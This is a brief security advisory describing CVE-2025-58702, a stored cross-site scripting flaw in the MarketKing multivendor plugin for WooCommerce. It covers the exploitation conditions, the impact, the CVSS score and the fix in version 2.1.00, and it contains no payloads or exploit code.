CVE-2025-58702

Vulnerability

Overview

CVE-2025-58702 is a Stored Cross-Site Scripting (XSS) vulnerability in the MarketKing multivendor marketplace plugin for WooCommerce, affecting all versions up to and including 2.0.92. The flaw stems from improper neutralization of user-supplied input during web page generation, allowing an authenticated attacker with subscriber-level privileges to inject arbitrary JavaScript or HTML into the application. [1]

Exploitation

Details

Exploitation requires that the attacker has at least a subscriber account on the WordPress site where the vulnerable plugin is active. The attacker can then inject malicious payloads into fields or inputs that are later displayed to other users. Successful exploitation requires an additional user interaction, such as clicking a crafted link or submitting a form, which triggers the stored script execution in the context of the victim's browser session. [1]

Impact

If exploited, an attacker could execute arbitrary scripts in the browsers of visitors or administrators, leading to potential consequences such as session hijacking, defacement, redirection to malicious sites, or theft of sensitive information displayed on the page. The CVSS v3 base score of 6.5 (Medium) reflects the need for authenticated access and user interaction, yet the impact on confidentiality and integrity is significant in a marketplace context. [1]

Mitigation

The plugin vendor has released version 2.1.00, which contains the fix. Users are strongly advised to update immediately. For Patchstack users, enabling auto-updates for vulnerable plugins is recommended. If an immediate update is not possible, apply temporary workarounds such as restricting subscriber accounts or using a web application firewall to filter XSS attempts. No evidence of active exploitation in the wild has been reported at the time of publication. [1]